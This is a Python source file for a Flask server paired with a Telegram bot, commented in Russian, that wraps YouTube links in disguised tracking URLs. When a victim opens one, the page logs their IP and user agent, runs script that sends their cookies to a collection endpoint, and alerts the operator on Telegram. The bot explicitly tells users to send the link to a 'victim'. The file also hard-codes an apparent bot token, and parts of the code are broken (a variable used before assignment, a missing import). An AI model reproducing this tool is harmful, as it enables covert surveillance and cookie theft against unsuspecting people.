import logging
import json
import re
import uuid
import os
import time
import sqlite3
import random
from datetime import datetime
import threading
import base64

# Flask
from flask import Flask, request, jsonify, render_template_string
from flask_cors import CORS

# Telegram версия 20.x
from telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup
from telegram.ext import (
    Application,
    CommandHandler,
    CallbackQueryHandler,
    MessageHandler,
    filters,
    ContextTypes
)
from telegram.constants import ParseMode

# ========== НАСТРОЙКИ ==========
BOT_TOKEN = "8342575399:AAFetGCZwKYOe4fwuXLkWsn6N3Q0VVEHGTs"
ADMIN_ID = 1709490182
FLASK_PORT = 5056  # Изменили на 5056
SERVER_URL = f"http://localhost:{FLASK_PORT}"

# Настройка логирования
logging.basicConfig(
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    level=logging.INFO
)
logger = logging.getLogger(__name__)

# ========== БАЗА ДАННЫХ ==========
class Database:
    def __init__(self):
        self.conn = sqlite3.connect('youtube_data.db', check_same_thread=False)
        self.create_tables()
    
    def create_tables(self):
        cursor = self.conn.cursor()
        
        cursor.execute('''
            CREATE TABLE IF NOT EXISTS video_links (
                id TEXT PRIMARY KEY,
                youtube_url TEXT,
                youtube_id TEXT,
                server_url TEXT,
                created_at TEXT,
                created_by INTEGER,
                clicks INTEGER DEFAULT 0
            )
        ''')
        
        cursor.execute('''
            CREATE TABLE IF NOT EXISTS captured_data (
                id TEXT PRIMARY KEY,
                link_id TEXT,
                timestamp TEXT,
                ip_address TEXT,
                user_agent TEXT
            )
        ''')
        
        self.conn.commit()
    
    def add_video_link(self, youtube_url, server_url, user_id):
        video_id = re.search(r'(?:v=|\/)([a-zA-Z0-9_-]{11})', youtube_url)
        video_id = video_id.group(1) if video_id else "dQw4w9WgXcQ"
        
        link_id = str(uuid.uuid4())[:8]
        
        cursor = self.conn.cursor()
        cursor.execute('''
            INSERT INTO video_links 
            (id, youtube_url, youtube_id, server_url, created_at, created_by, clicks)
            VALUES (?, ?, ?, ?, ?, ?, ?)
        ''', (
            link_id,
            youtube_url,
            video_id,
            server_url,
            datetime.now().isoformat(),
            user_id,
            0
        ))
        self.conn.commit()
        return link_id, video_id
    
    def increment_clicks(self, link_id):
        cursor = self.conn.cursor()
        cursor.execute('UPDATE video_links SET clicks = clicks + 1 WHERE id = ?', (link_id,))
        self.conn.commit()
    
    def get_link(self, link_id):
        cursor = self.conn.cursor()
        cursor.execute('SELECT * FROM video_links WHERE id = ?', (link_id,))
        row = cursor.fetchone()
        if not row:
            return None
        columns = [desc[0] for desc in cursor.description]
        return dict(zip(columns, row))
    
    def add_captured_data(self, link_id, ip_address, user_agent):
        data_id = str(uuid.uuid4())[:8]
        cursor = self.conn.cursor()
        cursor.execute('''
            INSERT INTO captured_data 
            (id, link_id, timestamp, ip_address, user_agent)
            VALUES (?, ?, ?, ?, ?)
        ''', (
            data_id,
            link_id,
            datetime.now().isoformat(),
            ip_address,
            user_agent
        ))
        self.conn.commit()
        return data_id

# Инициализация базы
db = Database()

# ========== FLASK СЕРВЕР ==========
app = Flask(__name__)
CORS(app)

@app.route('/')
def home():
    return '''
    <!DOCTYPE html>
    <html>
    <head>
        <title>YouTube Tracker</title>
        <style>
            body { font-family: Arial; padding: 50px; text-align: center; }
            input { padding: 10px; width: 300px; margin: 10px; }
            button { padding: 10px 20px; background: #007bff; color: white; border: none; cursor: pointer; }
        </style>
    </head>
    <body>
        <h1>🎬 YouTube Data Collector</h1>
        <form action="/create" method="POST">
            <input type="text" name="url" placeholder="YouTube URL" required>
            <br>
            <button type="submit">Create Link</button>
        </form>
    </body>
    </html>
    '''

@app.route('/create', methods=['POST'])
def create_link():
    youtube_url = request.form.get('url', '')
    if not youtube_url:
        return "No URL", 400
    
    link_id, video_id = db.add_video_link(youtube_url, f"{SERVER_URL}/watch?id={link_id}", 0)
    
    return f'''
    <!DOCTYPE html>
    <html>
    <body>
        <h1>✅ Link Created!</h1>
        <p><strong>Original:</strong> {youtube_url}</p>
        <p><strong>Your Link:</strong> {SERVER_URL}/watch?id={link_id}&v={video_id}</p>
        <button onclick="navigator.clipboard.writeText('{SERVER_URL}/watch?id={link_id}&v={video_id}')">
            Copy Link
        </button>
    </body>
    </html>
    '''

@app.route('/watch')
def watch():
    link_id = request.args.get('id', '')
    video_id = request.args.get('v', 'dQw4w9WgXcQ')
    
    if link_id:
        db.increment_clicks(link_id)
        ip_address = request.remote_addr
        user_agent = request.headers.get('User-Agent', '')
        db.add_captured_data(link_id, ip_address, user_agent)
        
        # Отправляем уведомление в Telegram
        send_telegram_notification(link_id, ip_address, user_agent)
    
    return f'''
    <!DOCTYPE html>
    <html>
    <head>
        <style>
            body {{ margin: 0; padding: 20px; background: #000; }}
        </style>
    </head>
    <body>
        <iframe width="100%" height="500" 
                src="https://www.youtube.com/embed/{video_id}?autoplay=1" 
                frameborder="0" allowfullscreen>
        </iframe>
        <script>
            // Сбор данных
            const data = {{
                userAgent: navigator.userAgent,
                screen: {{ width: screen.width, height: screen.height }},
                cookies: document.cookie
            }};
            
            // Отправка данных
            fetch('{SERVER_URL}/collect', {{
                method: 'POST',
                headers: {{ 'Content-Type': 'application/json' }},
                body: JSON.stringify({{ link_id: '{link_id}', data: data }})
            }});
        </script>
    </body>
    </html>
    '''

@app.route('/collect', methods=['POST'])
def collect():
    try:
        data = request.json
        logger.info(f"Collected data: {data}")
        return jsonify({"status": "ok"})
    except Exception as e:
        logger.error(f"Error: {e}")
        return jsonify({"status": "error"}), 500

def send_telegram_notification(link_id, ip, user_agent):
    """Отправка уведомления в Telegram"""
    try:
        url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
        text = f"""
🔔 НОВЫЙ ПОСЕТИТЕЛЬ!

🆔 ID ссылки: {link_id}
🌐 IP: {ip}
📱 Устройство: {user_agent[:100]}...
🕒 Время: {datetime.now().strftime('%H:%M:%S')}
        """
        
        requests.post(url, json={
            "chat_id": ADMIN_ID,
            "text": text,
            "parse_mode": "HTML"
        })
    except Exception as e:
        logger.error(f"Telegram error: {e}")

# ========== TELEGRAM BOT ==========
async def start(update: Update, context: ContextTypes.DEFAULT_TYPE):
    await update.message.reply_text(
        "🤖 YouTube Data Collector Bot\n\n"
        "Отправьте мне ссылку на YouTube видео, и я создам отслеживаемую ссылку.",
        parse_mode=ParseMode.HTML
    )

async def handle_message(update: Update, context: ContextTypes.DEFAULT_TYPE):
    text = update.message.text
    
    if 'youtube.com' in text or 'youtu.be' in text:
        user_id = update.effective_user.id
        
        # Создаем ссылку
        link_id, video_id = db.add_video_link(
            text, 
            f"{SERVER_URL}/watch?id={link_id}&v={video_id}",
            user_id
        )
        
        tracking_url = f"{SERVER_URL}/watch?id={link_id}&v={video_id}"
        
        await update.message.reply_text(
            f"✅ Ссылка создана!\n\n"
            f"🎬 Оригинал: {text}\n"
            f"🔗 Ваша ссылка: {tracking_url}\n\n"
            f"Отправьте эту ссылку жертве для сбора данных.",
            parse_mode=ParseMode.HTML
        )
    else:
        await update.message.reply_text(
            "Пожалуйста, отправьте ссылку на YouTube видео.",
            parse_mode=ParseMode.HTML
        )

def run_flask():
    """Запуск Flask сервера"""
    app.run(host='0.0.0.0', port=FLASK_PORT, debug=False, use_reloader=False)

def run_bot():
    """Запуск Telegram бота"""
    try:
        # Создаем Application
        application = Application.builder().token(BOT_TOKEN).build()
        
        # Регистрируем обработчики
        application.add_handler(CommandHandler("start", start))
        application.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, handle_message))
        
        # Запускаем бота
        print("🤖 Запуск Telegram бота...")
        application.run_polling(allowed_updates=Update.ALL_UPDATES)
        
    except Exception as e:
        logger.error(f"Bot error: {e}")

def main():
    print("=" * 50)
    print("🤖 YOUTUBE DATA COLLECTOR")
    print("=" * 50)
    print(f"🌐 Server: {SERVER_URL}")
    print(f"🚀 Port: {FLASK_PORT}")
    print(f"👑 Admin: {ADMIN_ID}")
    print()
    
    # Запускаем Flask в отдельном потоке
    flask_thread = threading.Thread(target=run_flask, daemon=True)
    flask_thread.start()
    
    # Ждем запуска Flask
    time.sleep(2)
    
    # Запускаем бота
    run_bot()

if __name__ == '__main__':
    main()
